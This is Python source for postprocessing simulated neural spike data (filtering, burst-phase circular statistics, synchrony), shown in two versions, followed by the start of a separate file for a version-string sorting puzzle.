def get_phis(pop_burst_peak1,pop_burst_peak2,bins):
    """Phase of each population-2 burst relative to population 1.

    Consecutive population-1 peaks define reference windows; every
    population-2 peak falling inside a window (boundaries inclusive)
    yields a phi in [0, 1]: its fractional position within the window.
    """
    phis = []
    # Slide a window over consecutive population-1 peaks.
    for window_start, window_end in zip(pop_burst_peak1[:-1], pop_burst_peak1[1:]):
        in_window = [p for p in pop_burst_peak2
                     if window_start <= p <= window_end]
        for peak in in_window:
            span = bins[window_end] - bins[window_start]
            phis.append((bins[peak] - bins[window_start]) / span)
    return phis
'''
Map phi values to a circle to accurately take the mean and std of the values
input:
phis- Phi values that are in [0,1]
output:
phis- Phi values that are now mapped to [0,2pi] represents radians
'''
def map_phi_to_complex(phis):
    """Map phase values in [0, 1] onto unit vectors on the complex circle.

    Parameters
    ==========
    phis: iterable of phase values in [0, 1]
    Returns
    =======
    list of complex unit vectors at angle 2*pi*phi
    """
    # Rewritten as a comprehension; the original bound its accumulator to
    # the name `complex`, shadowing the builtin type.
    return [cmath.rect(1, 2 * np.pi * phi) for phi in phis]
'''
This will get the mean phi and variance using circular statistics
input:
complex_values- This is a list of complex values that are gotten from the phi values
output:
mean_angle- This is the mean angle of the phi values, represents what the average phase is (can be converted back)
variance_circular- This is the variance of the angles, 0 represents all phi values are the same.
'''
def get_circular_statistics(complex_values):
    """Mean angle and resultant length of unit vectors on the circle.

    Returns (mean_angle, variance_circular) where variance_circular is the
    magnitude of the mean resultant vector: 1.0 means all phases coincide.
    """
    resultant = np.mean(complex_values)
    return cmath.phase(resultant), abs(resultant)
'''
This converts the mean angle back to the standard phi values which lies in [0,1]
input:
mean_angle- This is the mean angle that was calculated from the list of phis
output:
This is the converted average phi values that now consisted with other metrics
'''
def get_normalized_phi(mean_angle):
    """Convert a mean angle in radians (-pi, pi] back to a phi in [0, 1)."""
    two_pi = 2 * math.pi
    normalized = mean_angle / two_pi
    # Negative angles wrap around to the upper half of [0, 1).
    return normalized + 1 if mean_angle < 0 else normalized
def synchrony_stats(data, dt, maxlags=3000):
    """Synchrony measures for a population of filtered spike trains.

    Parameters
    ==========
    data: numneuron x time array
    dt: time spacing
    maxlags: maximal lag for autocorrelation, default=3000 ms (unused here)
    Returns
    =======
    chi: synchrony measure (variance ratio, 1.0 = perfectly synchronous)
    autocorr: autocorrelation of the mean-subtracted population average
    """
    pop_avg = np.mean(data, axis=0)
    # Variance of the population average over time...
    var_pop = np.mean(np.square(pop_avg)) - np.square(np.mean(pop_avg))
    # ...relative to the average of the per-neuron variances.
    var_each = np.mean(np.square(data), axis=1) - np.square(np.mean(data, axis=1))
    chi = np.sqrt(var_pop / np.mean(var_each))
    centered = pop_avg - np.mean(pop_avg)
    autocorr = scipy.signal.correlate(centered, centered, mode='valid')
    return chi, autocorr
def order_param(eta_norm, eta_t_norm, op_abs_thresh):
    '''
    Compute the order parameter for the normalized (phase) ETAs.
    Parameters
    ==========
    eta_norm: normalized ETA array
    eta_t_norm: [-.5, .5] phases corresponding to second axis of array
    op_abs_thresh: float
    Returns
    =======
    ops: array of complex valued order parameters, np.nan if undefined
    op_abs: magnitudes
    op_angle: angles
    op_mask: mask of ops with magnitude above threshold
    op_angle_mean: mean angle of significant ops
    op_angle_std: standard deviation of significant ops
    '''
    assert op_abs_thresh < 0.5 and op_abs_thresh >= 0.0,\
        'op_abs_thresh out of range'
    num_neurons=eta_norm.shape[0]
    num_bins=eta_norm.shape[1]
    dtheta=np.min(np.diff(eta_t_norm))  # NOTE(review): computed but unused
    # below will generate NaNs if the normalization is 0
    density_eta=eta_norm/np.tile(np.sum(eta_norm, axis=1),(num_bins,1)).T
    # First circular moment of each neuron's phase density:
    # ops[k] = sum_j density_k(theta_j) * exp(2*pi*i*theta_j)
    ops=np.sum(density_eta*
               np.exp(1.0j*
                      np.tile(eta_t_norm,(num_neurons,1))*
                      (2*np.pi)),
               axis=1)
    op_angle=np.angle(ops)/(2*np.pi)  # angle mapped back to phase units [-.5, .5]
    op_abs=np.abs(ops)
    # Keep only cells whose phase locking exceeds the threshold.
    op_mask=op_abs > op_abs_thresh
    op_angle_mean=np.nanmean(op_angle[op_mask])
    op_angle_std=np.nanstd(op_angle[op_mask])
    return (ops,op_abs,op_angle,op_mask,op_angle_mean,op_angle_std)
def event_trig_avg(events, data, normalize=False, pts=10):
    '''
    Compute an event-triggered average.
    Parameters
    ==========
    events, ndarray
        Array of event indices.
    data, ndarray, ndim=2
        Array to be averaged along dim 1 relative to the events.
    normalize, bool, optional
        Whether to normalize to phase variable
    pts, int, optional
        Half-width (in grid points) of the normalized phase grid.
    Returns
    =======
    eta, ndarray
        Event-triggered average, one row per row of data.
    '''
    # Midpoints between consecutive events delimit the averaging windows.
    # BUGFIX: np.int/np.float were removed in NumPy 1.24; the builtins are
    # the exact dtypes the aliases referred to.
    breakpts=np.array(
        np.hstack((0, (events[0:-1] + events[1:]) / 2., data.shape[1]-1)),
        dtype=int)
    if normalize:
        from scipy.interpolate import griddata
        max_interval=2*pts
        fullrange=np.linspace(-.5, .5, num=max_interval)
        xgrid1=fullrange[0:pts]
        xgrid2=fullrange[pts:]
    else:
        # Widest window on either side of any event sets the output width.
        max_interval=2*np.max(np.hstack((events-breakpts[0:-1],
                                         breakpts[1:]-events)))
        midpt=int(np.floor(max_interval / 2))
    numevents=events.shape[0]-2 # don't use 1st and last due to boundary
    eta=np.zeros((data.shape[0], max_interval))
    for j in range(numevents):
        i=j+1
        timeidx=np.arange(int(breakpts[i]), int(breakpts[i+1]), dtype=int)
        thisevent=events[i]
        center=int(np.where(timeidx==thisevent)[0].astype(int))
        if normalize:
            # Map samples before/after the event onto [-.5, 0) / (0, .5]
            # and resample onto the common phase grid.
            xs1=np.array(timeidx[:center] - timeidx[center], dtype=float)
            xs1 /= xs1[0]*(-2.0)
            xs2=np.array(timeidx[center+1:] - timeidx[center], dtype=float)
            xs2 /= xs2[-1]*2.0
            xs=np.hstack((xs1, xs2))
            toadd=np.apply_along_axis(lambda x:
                                      scipy.interpolate.griddata(
                                          xs, x, fullrange),
                                      1, data[:,timeidx])
            eta += toadd
        else:
            # Zero-pad so every window is centered on its event.
            lpad=midpt - center
            rpad=max_interval - (len(timeidx)+lpad)
            eta += np.pad(data[:, timeidx], ((0,0), (lpad,rpad)),
                          'constant', constant_values=(0,0))
    eta /= float(numevents)
    eta[eta < 0] = 0
    return eta
'''
This method is adapted from the old main methods of the code, this method will do all the post processing
and allows it to be run independently of main, passing dictionaries in without saving and loading them to the hard disk, to avoid excess memory usage
Output:
mdict - The dictionary of final variables and results. Can either be saved or used as is.
'''
def run(sim_output,trans,sec_flag,spike_thresh,f_sigma,butter_low,butter_high,bin_width,cutoff,are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh):
    '''
    Perform all postprocessing on a simulation output dictionary and
    return the results as a dictionary, so the pipeline can be reused
    without round-tripping through .mat files.

    Parameters
    ==========
    sim_output: dict loaded from the simulation .mat file
        (requires keys 'graphFn', 'dt', 'Y', 'tf')
    trans: transient time to discard (ms)
    sec_flag: True if simulation time units are seconds
    spike_thresh: spike-detection threshold (mV), used when are_volts
    f_sigma: gaussian filter std (ms)
    butter_low, butter_high: Butterworth cutoff frequencies (Hz)
    bin_width: spike binning width (ms)
    cutoff: burst cutoff parameter (accepted but unused here)
    are_volts: True if 'Y' holds voltage traces, False for sparse spikes
    peak_order, peak_percentile: burst-peak detection parameters
    eta_norm_pts, op_abs_thresh: settings for the (currently disabled)
        ETA / order-parameter section
    Returns
    =======
    mdict: dictionary of postprocessed results
    '''
    butter_freq = np.array([butter_low,butter_high])
    # Convert seconds to ms if necessary.
    if sec_flag:
        scalet=1e3
    else:
        scalet = 1
    # graphFn may be wrapped in a 1-element array by scipy.io.loadmat.
    graph_fn = ''
    if isinstance(sim_output['graphFn'],np.ndarray):
        graph_fn = str(sim_output['graphFn'][0])
    else:
        graph_fn = sim_output['graphFn']
    #Retrieve parameters from dictionary and data
    dt = float(sim_output['dt'])*scalet
    data = chop_transient(sim_output['Y'],trans,dt)
    num_neurons = np.shape(data)[0]
    tmax = np.shape(data)[1]
    #Generate spike trains from the data and bin the spikes
    if are_volts:
        spikes, spike_mat = find_spikes(data, spike_thresh)
    else:
        # BUGFIX: scipy.sparse.csc.csc_matrix is a private module path that
        # was removed in recent SciPy; use the public constructor.
        data = scipy.sparse.csc_matrix(data)
        spike_mat= data.todense()
        spikes = data.nonzero()
    bins, spike_mat_bin = bin_spikes(spike_mat, bin_width, dt)
    #Get the filtered data for each half of the population.
    # BUGFIX: use integer division -- num_neurons/2 is a float under
    # Python 3 and is not a valid slice index.
    half = num_neurons // 2
    spike_fil_bin, butter_int_bin, spike_fil_butter = spikes_filt(spike_mat_bin[:half],
                                                                  dt*bin_width,
                                                                  f_sigma,
                                                                  butter_freq)
    spike_fil_bin2, butter_int_bin2, spike_fil_butter2 = spikes_filt(spike_mat_bin[half:],
                                                                     dt*bin_width,
                                                                     f_sigma,
                                                                     butter_freq)
    #Calculate Correlation Values
    cross_correlation = xcorr(butter_int_bin2,butter_int_bin)
    auto_cross_correlation1 = xcorr(butter_int_bin,butter_int_bin)
    auto_cross_correlation2 = xcorr(butter_int_bin2,butter_int_bin2)
    #phase_lag,pop_corr = find_metrics(cross_correlation,auto_cross_correlation1)
    #graph attributes
    cells_inhib,graph_edges,number_of_nodes,degree_histogram = get_graphinfo(graph_fn)
    #Calculating Values for Circle Map
    pop_burst_peak1 = burst_stats(butter_int_bin,peak_order,peak_percentile,dt*bin_width/1000.)
    pop_burst_peak2 = burst_stats(butter_int_bin2,peak_order,peak_percentile,dt*bin_width/1000.)
    phis = get_phis(pop_burst_peak1,pop_burst_peak2,bins)
    complex_phis = map_phi_to_complex(phis)
    mean_angle,variance_angle = get_circular_statistics(complex_phis)
    mean_phi = get_normalized_phi(mean_angle)
    #std_phi = np.std(phis)
    #Get Synchrony Values for each signal
    chi1,chi1_auto = synchrony_stats(spike_fil_bin,dt*bin_width/1000.)
    chi2,chi2_auto = synchrony_stats(spike_fil_bin2,dt*bin_width/1000.)
    '''##Compute event triggered averages and get individual cell statistics
    ##Population 1
    ##Normalize time to phase variable [-.5,.5]
    eta1_norm = event_trig_avg(pop_burst_peak1,spike_fil_bin,normalize=True,pts=eta_norm_pts)
    eta1_t_norm = np.linspace(-0.5, 0.5, 2*eta_norm_pts)
    ##Order Parameters
    (ops1,op_abs1,op_angle1,op_mask1,
     op_angle_mean1,op_angle_std1)=order_param(eta1_norm,eta1_t_norm,op_abs_thresh)
    ##Population 2
    ##Normalize time to phase variable [-.5,.5]
    eta2_norm = event_trig_avg(pop_burst_peak2,spike_fil_bin2,normalize=True,pts=eta_norm_pts)
    eta2_t_norm = np.linspace(-0.5, 0.5, 2*eta_norm_pts)
    ##Order Parameters
    (ops2,op_abs2,op_angle2,op_mask2,
     op_angle_mean2,op_angle_std2)=order_param(eta2_norm,eta2_t_norm,op_abs_thresh)'''
    mdict = {'bins':bins,
             'spike_mat':spike_mat,
             'spike_mat_bin':spike_mat_bin,
             # BUGFIX: the original dict listed 'spike_fil_bin' twice, so the
             # population-1 filtered data was silently overwritten by the
             # population-2 data; give the second array its own key.
             'spike_fil_bin':spike_fil_bin,
             'spike_fil_bin2':spike_fil_bin2,
             'butter_int_bin': butter_int_bin,
             'butter_int_bin2': butter_int_bin2,
             'cross_correlation': cross_correlation,
             'auto_cross_correlation1':auto_cross_correlation1,
             'auto_cross_correlation2':auto_cross_correlation2,
             'cells_inhib': cells_inhib,
             'graph_edges':graph_edges,
             'number_of_nodes':number_of_nodes,
             'degree_histogram':degree_histogram,
             #'phase_lag': phase_lag,
             #'pop_correlation': pop_corr,
             'time': sim_output['tf'],
             'bin_width': bin_width,
             'phis' : phis,
             'mean_phi': mean_phi,
             'variance_angle' : variance_angle,
             'chi1' : chi1,
             'chi2' : chi2,
             'pop_burst_peak1': pop_burst_peak1,
             'pop_burst_peak2': pop_burst_peak2
             #'op_abs1' : op_abs1,
             #'op_angle1' : op_angle1,
             #'op_angle_mean1' : op_angle_mean1,
             #'op_angle_std1' : op_angle_std1,
             #'op_abs2' : op_abs2,
             #'op_angle2' : op_angle2,
             #'op_angle_mean2' : op_angle_mean2,
             #'op_angle_std2' : op_angle_std2
             }
    return mdict
def main(argv=None):
    """Entry point: parse arguments, postprocess, and save or return.

    When invoked from the command line (argv is None), results are saved
    to the output .mat file; when argv is supplied programmatically, the
    result dictionary is returned instead of being saved.
    """
    should_save = argv is None
    if argv is None:
        argv = sys.argv
    (simFn, outFn, trans, sec_flag, spike_thresh, f_sigma, butter_low,
     butter_high, bin_width, cutoff, are_volts, peak_order, peak_percentile,
     eta_norm_pts, op_abs_thresh) = parse_args(argv)
    sim_output = scipy.io.loadmat(simFn)
    post_dict = run(sim_output, trans, sec_flag, spike_thresh, f_sigma,
                    butter_low, butter_high, bin_width, cutoff, are_volts,
                    peak_order, peak_percentile, eta_norm_pts, op_abs_thresh)
    if should_save:
        scipy.io.savemat(outFn, post_dict, oned_as='column')
    else:
        return post_dict
if __name__ == '__main__':
    # Script entry point: main() returns None on the save path, which
    # sys.exit treats as exit status 0.
    status = main()
    sys.exit(status)
| 37.757971 | 188 | 0.630446 |
import sys
import numpy as np
import scipy.signal
import scipy.io
import argparse
import networkx as nx
import matplotlib.pyplot as plt
import cmath
import math
maxorder=20
eta_norm_pts = 10
def parse_args(argv):
transient = 10000
spike_thresh = -20
f_sigma = 20
butter_high = 4
butter_low = -np.inf
bin_width = 20
cutoff = 0.5
peak_order = 30
peak_percentile = 75
eta_norm_pts=8
op_abs_thresh=0.2
parser = argparse.ArgumentParser(prog="doPost",
description=('Postprocessing of'
' model output'))
parser.add_argument('sim', help='model output (.mat) file')
parser.add_argument('output', help='output (.jpg) filename')
parser.add_argument('--transient', '-t',
help='transient time, ms (default: %(default)s)',
type=float, default=transient)
parser.add_argument('--sec', '-s', action='store_true',
help='time units are in seconds (default: ms)')
parser.add_argument('--volt', '-V', action='store_true',
help=('file contains voltage traces '
'(default: sparse spike trains)'))
parser.add_argument('--thresh',
help='spike threshold, mV (default: %(default)s)',
type=float, default=spike_thresh)
parser.add_argument('--fsig', '-f',
help=('filter standard deviation, ms '
'(default: %(default)s)'),
type=float, default=f_sigma)
parser.add_argument('--butter_high',
help=('Butterworth filter upper cutoff frequency, Hz '
'(default: %(default)s)'),
type=float, default=butter_high)
parser.add_argument('--butter_low',
help=('Butterworth filter lower cutoff frequency, Hz '
'(default: %(default)s)'),
type=float, default=butter_low)
parser.add_argument('--bin_width', '-b',
help='bin width, ms (default: %(default)s)',
type=float, default=bin_width)
parser.add_argument('--cut', '-c',
help='burst cutoff parameter (default: %(default)s)',
type=float, default=cutoff)
args = parser.parse_args(argv[1:])
return args.sim, args.output, args.transient, args.sec, args.thresh, \
args.fsig, args.butter_low, args.butter_high, args.bin_width,\
args.cut, args.volt,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh,
def chop_transient(data, transient, dt):
firstIdx = int(np.ceil(transient / dt) - 1)
return data[:,firstIdx:]
def find_spikes(data, threshold):
indices = scipy.signal.argrelmax(data, axis=1)
mask = np.where(data[indices] > threshold)
new_indices = (indices[0][mask],
indices[1][mask])
spike_mat = np.zeros(np.shape(data), dtype=np.int)
spike_mat[new_indices] = 1
return new_indices, spike_mat
def spikes_of_neuron(spikes, neuron):
return spikes[1][np.where(spikes[0] == neuron)]
def spikes_filt(spike_mat, samp_freq, f_sigma, butter_freq):
def filt_window_gauss(samp_freq, std = 20, width = None, normalize = 1):
if width is None:
width = std*4+1
width /= samp_freq
std /= samp_freq
w = scipy.signal.gaussian(width, std)
if not normalize == 0:
w = normalize * w / sum(w)
return w
def filt_gauss(spike_mat, samp_freq, f_sigma=20):
w = filt_window_gauss(samp_freq, std=f_sigma, normalize=1)
spike_fil = scipy.signal.fftconvolve(spike_mat, w[ np.newaxis, : ],
mode='same')
return spike_fil
def filt_butter(data, samp_freq, butter_freq, axis=-1):
order = 2
ny = 0.5 / samp_freq
cof = butter_freq / ny
if np.isneginf(cof[0]) and np.isfinite(cof[1]):
cof1 = cof[1]
b, a = scipy.signal.butter(order, cof1, btype='low')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
elif np.isfinite(cof[0]) and np.isinf(cof[1]):
cof1 = cof[0]
b, a = scipy.signal.butter(order, cof1, btype='high')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
elif np.isfinite(cof[0]) and np.isfinite(cof[1]):
b, a = scipy.signal.butter(order, cof, btype='band')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
else:
raise Exception('filt_butter called with bad cutoff frequency')
filtNs /= samp_freq
return filtNs
spike_fil = filt_gauss(spike_mat, samp_freq, f_sigma=f_sigma)
int_signal = filt_butter(np.mean(spike_mat, axis=0),
samp_freq*1e-3, butter_freq)
spike_fil_butter = filt_butter(spike_fil, samp_freq*1e-3,
butter_freq, axis=1)
return spike_fil, int_signal, spike_fil_butter
def bin_spikes(spike_mat, bin_width, dt):
num_neurons= np.shape(spike_mat)[0]
num_times = np.shape(spike_mat)[1]
stride = int(np.ceil(bin_width / dt))
bins = np.arange(0, num_times, stride, dtype=np.float)
which_bins = np.digitize(range(0, num_times), bins)
num_bins = len(bins)
binned_spikes = np.zeros((num_neurons, num_bins), dtype=np.int)
for i in range(num_bins):
bin_mask = np.where(which_bins == i)[0]
bin_data = spike_mat[:,bin_mask]
binned_spikes[:,i] = np.sum(bin_data, axis=1).flatten()
return bins, binned_spikes
def xcorr(signal_1,signal_2):
signal_1 = np.asarray(signal_1)
signal_2 = np.asarray(signal_2)
m1 = np.mean(signal_1)
m2 = np.mean(signal_2)
signal_1_centered = (signal_1 - m1) / (np.std(signal_1) * len(signal_1))
signal_2_centered = (signal_2 - m2) / np.std(signal_2)
xcorr = scipy.signal.correlate(signal_1_centered,signal_2_centered)
return xcorr
def get_graphinfo(graph_fn):
graph = nx.read_gml(graph_fn)
cells_inhib = np.array(nx.get_node_attributes(graph, 'inh').values(),
dtype=np.int)
graph_edges = nx.edges(graph)
number_of_nodes = nx.number_of_nodes(graph)
degree_histogram = nx.degree_histogram(graph)
return cells_inhib, graph_edges,number_of_nodes,degree_histogram
def find_max_time(peak_times,signal):
max_time = np.nan
for t in peak_times:
if np.isnan(max_time):
max_time = t
elif signal[t] > signal[max_time]:
max_time = t
return max_time
def find_metrics(xcorr,autocorr):
max_time_cross = np.nan;
peak_auto = scipy.signal.argrelmax(autocorr)[0].tolist()
peak_cross = scipy.signal.argrelmax(xcorr)[0].tolist()
max_time = find_max_time(peak_auto,autocorr)
for i in range(peak_auto.index(max_time)+1,len(peak_auto)):
if autocorr[peak_auto[i]] > 0:
max_time_next = peak_auto[i]
break
for x in peak_cross:
if x > max_time and x < max_time_next and xcorr[x] > 0:
max_time_cross = x
break
auto_period = max_time_next - max_time
auto_cross_perioid = max_time_cross - max_time
phase = float(auto_cross_perioid)/float(auto_period)
return phase, xcorr[max_time_cross]
def burst_stats(signal,peak_order,peak_percentile,dt):
pop_burst_peak=scipy.signal.argrelmax(signal, order=peak_order)[0]
pop_burst_peak=pop_burst_peak[signal[pop_burst_peak] >
np.percentile(signal,peak_percentile)]
return pop_burst_peak
def get_phis(pop_burst_peak1,pop_burst_peak2,bins):
phis = []
windowStartIndex = 0
windowEndIndex = 1
while windowEndIndex < len(pop_burst_peak1):
windowStart = pop_burst_peak1[windowStartIndex]
windowEnd = pop_burst_peak1[windowEndIndex]
peaksInWindow = [i for i in pop_burst_peak2 if i >= windowStart and i <= windowEnd]
for peak in peaksInWindow:
phi = (bins[peak] - bins[windowStart]) / (bins[windowEnd] - bins[windowStart])
phis.append(phi)
windowStartIndex = windowEndIndex
windowEndIndex = windowEndIndex + 1
return phis
def map_phi_to_complex(phis):
complex = []
for i in range(len(phis)):
radians = 2*np.pi*phis[i]
complex.append(cmath.rect(1,radians))
return complex
def get_circular_statistics(complex_values):
mean_resultant = np.mean(complex_values)
mean_angle = cmath.phase(mean_resultant)
variance_circular = abs(mean_resultant)
return mean_angle,variance_circular
def get_normalized_phi(mean_angle):
if mean_angle < 0:
return (2*math.pi + mean_angle) / (2*math.pi)
else:
return mean_angle / (2*math.pi)
def synchrony_stats(data, dt, maxlags=3000):
data_pop=np.mean(data, axis=0)
sigma_pop=np.mean(np.square(data_pop)) - np.square(np.mean(data_pop))
sigma=np.mean(np.square(data), axis=1) - np.square(np.mean(data, axis=1))
sigma_mean=np.mean(sigma)
chisq=sigma_pop / sigma_mean
chi=np.sqrt(chisq)
mean_subtract=data_pop - np.mean(data_pop)
autocorr=scipy.signal.correlate(mean_subtract, mean_subtract,
mode='valid')
return chi, autocorr
def order_param(eta_norm, eta_t_norm, op_abs_thresh):
assert op_abs_thresh < 0.5 and op_abs_thresh >= 0.0,\
'op_abs_thresh out of range'
num_neurons=eta_norm.shape[0]
num_bins=eta_norm.shape[1]
dtheta=np.min(np.diff(eta_t_norm))
density_eta=eta_norm/np.tile(np.sum(eta_norm, axis=1),(num_bins,1)).T
ops=np.sum(density_eta*
np.exp(1.0j*
np.tile(eta_t_norm,(num_neurons,1))*
(2*np.pi)),
axis=1)
op_angle=np.angle(ops)/(2*np.pi)
op_abs=np.abs(ops)
op_mask=op_abs > op_abs_thresh
op_angle_mean=np.nanmean(op_angle[op_mask])
op_angle_std=np.nanstd(op_angle[op_mask])
return (ops,op_abs,op_angle,op_mask,op_angle_mean,op_angle_std)
def event_trig_avg(events, data, normalize=False, pts=10):
breakpts=np.array(
np.hstack((0, (events[0:-1] + events[1:]) / 2., data.shape[1]-1)),
dtype=np.int)
if normalize:
from scipy.interpolate import griddata
max_interval=2*pts
fullrange=np.linspace(-.5, .5, num=max_interval)
xgrid1=fullrange[0:pts]
xgrid2=fullrange[pts:]
else:
max_interval=2*np.max(np.hstack((events-breakpts[0:-1],
breakpts[1:]-events)))
midpt=int(np.floor(max_interval / 2))
numevents=events.shape[0]-2
eta=np.zeros((data.shape[0], max_interval))
for j in range(numevents):
i=j+1
timeidx=np.arange(int(breakpts[i]), int(breakpts[i+1]), dtype=np.int)
thisevent=events[i]
center=int(np.where(timeidx==thisevent)[0].astype(int))
if normalize:
xs1=np.array(timeidx[:center] - timeidx[center], dtype=np.float)
xs1 /= xs1[0]*(-2.0)
xs2=np.array(timeidx[center+1:] - timeidx[center], dtype=np.float)
xs2 /= xs2[-1]*2.0
xs=np.hstack((xs1, xs2))
toadd=np.apply_along_axis(lambda x:
scipy.interpolate.griddata(
xs, x, fullrange),
1, data[:,timeidx])
eta += toadd
else:
lpad=midpt - center
rpad=max_interval - (len(timeidx)+lpad)
eta += np.pad(data[:, timeidx], ((0,0), (lpad,rpad)),
'constant', constant_values=(0,0))
eta /= float(numevents)
eta[eta < 0] = 0
return eta
def run(sim_output,trans,sec_flag,spike_thresh,f_sigma,butter_low,butter_high,bin_width,cutoff,are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh):
butter_freq = np.array([butter_low,butter_high])
if sec_flag:
scalet=1e3
else:
scalet = 1
graph_fn = ''
if isinstance(sim_output['graphFn'],np.ndarray):
graph_fn = str(sim_output['graphFn'][0])
else:
graph_fn = sim_output['graphFn']
#Retrieve parameters from dictionary and data
dt = float(sim_output['dt'])*scalet
data = chop_transient(sim_output['Y'],trans,dt)
num_neurons = np.shape(data)[0]
tmax = np.shape(data)[1]
#Generate spike trains from the data and bin the spikes
if are_volts:
spikes, spike_mat = find_spikes(data, spike_thresh)
else:
data = scipy.sparse.csc.csc_matrix(data)
spike_mat= data.todense()
spikes = data.nonzero()
bins, spike_mat_bin = bin_spikes(spike_mat, bin_width, dt)
#Get the different versions of the filtered data
spike_fil_bin, butter_int_bin, spike_fil_butter = spikes_filt(spike_mat_bin[:num_neurons/2],
dt*bin_width,
f_sigma,
butter_freq)
spike_fil_bin2, butter_int_bin2, spike_fil_butter2 = spikes_filt(spike_mat_bin[num_neurons/2:],
dt*bin_width,
f_sigma,
butter_freq)
#Calculate Correlation Values
cross_correlation = xcorr(butter_int_bin2,butter_int_bin)
auto_cross_correlation1 = xcorr(butter_int_bin,butter_int_bin)
auto_cross_correlation2 = xcorr(butter_int_bin2,butter_int_bin2)
#phase_lag,pop_corr = find_metrics(cross_correlation,auto_cross_correlation1)
#graph attributes
cells_inhib,graph_edges,number_of_nodes,degree_histogram = get_graphinfo(graph_fn)
#Calculating Values for Circle Map
pop_burst_peak1 = burst_stats(butter_int_bin,peak_order,peak_percentile,dt*bin_width/1000.)
pop_burst_peak2 = burst_stats(butter_int_bin2,peak_order,peak_percentile,dt*bin_width/1000.)
phis = get_phis(pop_burst_peak1,pop_burst_peak2,bins)
complex_phis = map_phi_to_complex(phis)
mean_angle,variance_angle = get_circular_statistics(complex_phis)
mean_phi = get_normalized_phi(mean_angle)
#std_phi = np.std(phis)
#Get Synchrony Values for each signal
chi1,chi1_auto = synchrony_stats(spike_fil_bin,dt*bin_width/1000.)
chi2,chi2_auto = synchrony_stats(spike_fil_bin2,dt*bin_width/1000.)
mdict = {'bins':bins,
'spike_mat':spike_mat,
'spike_mat_bin':spike_mat_bin,
'spike_fil_bin':spike_fil_bin,
'spike_fil_bin':spike_fil_bin2,
'butter_int_bin': butter_int_bin,
'butter_int_bin2': butter_int_bin2,
'cross_correlation': cross_correlation,
'auto_cross_correlation1':auto_cross_correlation1,
'auto_cross_correlation2':auto_cross_correlation2,
'cells_inhib': cells_inhib,
'graph_edges':graph_edges,
'number_of_nodes':number_of_nodes,
'degree_histogram':degree_histogram,
#'phase_lag': phase_lag,
#'pop_correlation': pop_corr,
'time': sim_output['tf'],
'bin_width': bin_width,
'phis' : phis,
'mean_phi': mean_phi,
'variance_angle' : variance_angle,
'chi1' : chi1,
'chi2' : chi2,
'pop_burst_peak1': pop_burst_peak1,
'pop_burst_peak2': pop_burst_peak2
#'op_abs1' : op_abs1,
#'op_angle1' : op_angle1,
#'op_angle_mean1' : op_angle_mean1,
#'op_angle_std1' : op_angle_std1,
#'op_abs2' : op_abs2,
#'op_angle2' : op_angle2,
#'op_angle_mean2' : op_angle_mean2,
#'op_angle_std2' : op_angle_std2
}
return mdict
def main(argv=None):
    """Post-process one simulation .mat file.

    When invoked as a script (no explicit argv) the post-processing results
    are written to the output file named on the command line; when argv is
    supplied by a caller, the results dict is returned instead of saved.
    """
    # Script mode iff no explicit argv was handed in.
    should_save = argv is None
    if should_save:
        argv = sys.argv
    (simFn, outFn, trans, sec_flag, spike_thresh, f_sigma, butter_low,
     butter_high, bin_width, cutoff, are_volts, peak_order, peak_percentile,
     eta_norm_pts, op_abs_thresh) = parse_args(argv)
    sim_output = scipy.io.loadmat(simFn)
    post_dict = run(sim_output, trans, sec_flag, spike_thresh, f_sigma,
                    butter_low, butter_high, bin_width, cutoff, are_volts,
                    peak_order, peak_percentile, eta_norm_pts, op_abs_thresh)
    if should_save:
        scipy.io.savemat(outFn, post_dict, oned_as='column')
    else:
        return post_dict

if __name__ == '__main__':
    status = main()
    sys.exit(status)
| true | true |
1c33382a90cfba888a05b51de0ec3f4456a3473f | 4,373 | py | Python | Code/fun3.py | HalforcNull/Research_PatternRecognition | e9cbe8df75ae775e0ed813ac4956973b4e857979 | [
"MIT"
] | null | null | null | Code/fun3.py | HalforcNull/Research_PatternRecognition | e9cbe8df75ae775e0ed813ac4956973b4e857979 | [
"MIT"
] | null | null | null | Code/fun3.py | HalforcNull/Research_PatternRecognition | e9cbe8df75ae775e0ed813ac4956973b4e857979 | [
"MIT"
] | null | null | null | """
Elevator Maintenance
====================
You've been assigned the onerous task of elevator maintenance - ugh! It wouldn't be so bad, except that all the elevator documentation has been lying in a disorganized pile at the bottom of a filing cabinet for years, and you don't even know what elevator version numbers you'll be working on.
Elevator versions are represented by a series of numbers, divided up into major, minor and revision integers. New versions of an elevator increase the major number, e.g. 1, 2, 3, and so on. When new features are added to an elevator without being a complete new version, a second number named "minor" can be used to represent those new additions, e.g. 1.0, 1.1, 1.2, etc. Small fixes or maintenance work can be represented by a third number named "revision", e.g. 1.1.1, 1.1.2, 1.2.0, and so on. The number zero can be used as a major for pre-release versions of elevators, e.g. 0.1, 0.5, 0.9.2, etc (Commander Lambda is careful to always beta test her new technology, with her loyal henchmen as subjects!).
Given a list of elevator versions represented as strings, write a function answer(l) that returns the same list sorted in ascending order by major, minor, and revision number so that you can identify the current elevator version. The versions in list l will always contain major numbers, but minor and revision numbers are optional. If the version contains a revision number, then it will also have a minor number.
For example, given the list l as ["1.1.2", "1.0", "1.3.3", "1.0.12", "1.0.2"], the function answer(l) would return the list ["1.0", "1.0.2", "1.0.12", "1.1.2", "1.3.3"]. If two or more versions are equivalent but one version contains more numbers than the others, then these versions must be sorted ascending based on how many numbers they have, e.g. ["1", "1.0", "1.0.0"]. The number of elements in the list l will be at least 1 and will not exceed 100.
Languages
=========
To provide a Python solution, edit solution.py
To provide a Java solution, edit solution.java
Test cases
==========
Inputs:
(string list) l = ["1.1.2", "1.0", "1.3.3", "1.0.12", "1.0.2"]
Output:
(string list) ["1.0", "1.0.2", "1.0.12", "1.1.2", "1.3.3"]
Inputs:
(string list) l = ["1.11", "2.0.0", "1.2", "2", "0.1", "1.2.1", "1.1.1", "2.0"]
Output:
(string list) ["0.1", "1.1.1", "1.2", "1.2.1", "1.11", "2", "2.0", "2.0.0"]
"""
class node:
    """A single BST node holding one version string.

    Ordering between version strings is defined by isBefore(): components
    are compared numerically left to right, and a version that is a strict
    prefix of another (e.g. "1" vs "1.0") sorts first.
    """

    # Class-level defaults; __init__ sets value/father, and tree code
    # attaches children by assigning left/right.
    left = None
    right = None
    father = None
    value = ''

    def __init__(self, v, father):
        self.value = v
